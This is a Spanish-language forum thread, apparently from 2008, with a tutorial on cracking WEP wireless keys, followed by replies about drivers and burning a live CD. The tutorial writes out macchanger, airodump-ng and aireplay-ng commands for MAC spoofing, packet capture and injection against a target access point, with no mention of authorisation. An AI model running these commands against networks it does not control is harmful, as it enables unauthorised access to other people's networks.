Group: Hackerss Member
Member No.: 4,887
Cómo obtener la clave de un punto de acceso encriptada bajo WEP
A continuación demuestro 3 videos en donde explico cómo obtener la clave de acceso de ruteador encriptado bajo WEP. Hay mucha teoría y mucha paja por todos lados... Akí lo veremos de la forma más sencilla posible.
Comandos que utilizo en los tres videos:
Video 1: ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 ifconfig wlan0 up airodump-ng wlan0 airodump-ng wlan0 -w [achivo_captura_resultante] -c [#canal]
Video 2: aireplay-ng wlan0 -1 0 -e [PUNTO_DE_ACCESO] -a [MAC_PUNTO_ACCESO] -h [00:11:22:33:44:55 o MAC PROPIA SI NO USASTE MACCHANGER] aireplay-ng wlan0 -3 -b [MAC_PUNTO_ACCESO] -h [00:11:22:33:44:55 o MAC PROPIA SI NO USASTE MACCHANGER]
QUOTE(c0dex @ Jun 6 2008, 11:16 PM)
creo aver visto estos videos en otra parte u.u ( infoxp, del tata de nekrox x) ) pues habra que verlos buen post.
Asi es mi buen los subi a youtube y deje un post con mis camaradas de informaticaxp Para cualquier cosa, estamos al pendiente. Utilicen un cifrado más robusto
From: canada
Member No.: 1,762
ecxelente post pues yo me dedico mas al mantenimiento de pcs y la verdad me late la programacion tengo mas q aprender y me dare una vuelta por tu pagina nos vemos.
From: Lima - Peru
Member No.: 5
Interesante, no se si para este caso pero ya lo he usado antes pero hay problemas con mi tarjeta es una Atheros AR5007 802.11b/g y creo que no hay los controladores o noc, me podrias ayudar?
From: canada
Member No.: 1,762
hola solo es una cuestion, fijate q he tratado de bootear con el live cd pero no pasa nada inicia windows normal windows vista home premium y la verdad nose si lo copie bien la iamgen iso, segui los pasos como dicen en algunos tutos pero nada y me gustaria conocer bien ese programita de antemano gracias si podrias ayudarme como copiar la imagen en nero ok gracias.
Member No.: 5,500
Pinta bien.
No he descargado los videos aún. Pero...
Que plataforma usar linux o win2?... Sirbe para rooters 2wire? Funcinara en realidad? Son las preguntas que ahora me hago ñ_ñ....
Parese mucho aircrack muy viejo peor muy bueno. Dicen. Me han contado... No me crean ñ_ñ...
Si en verdad puedes optener la clave encriptada del WEP, Telmex te deberia contratar y ganarias miles de $ incluso dolares. ñ_ñ como asesor en seguridad.
Retirado de estos vicios.
--------------------
"Kiss In The Dark"; C# - PHP - Flash Professional - Mysql - Gives us life and the life we removed
flash el cifrado wep ya es inseguro, se puede obtener la contraseña de acceso en algunos minutos...
Y muchos router tienen este tipo de cifrado por dfecto.
copodenieve si no puedes quemar correctamente la imagen del cd prueba con nero... abres nero expres, image disco o copia... imagen de disco o proyecto guardado... si tienes dudas crea un nuevo hilo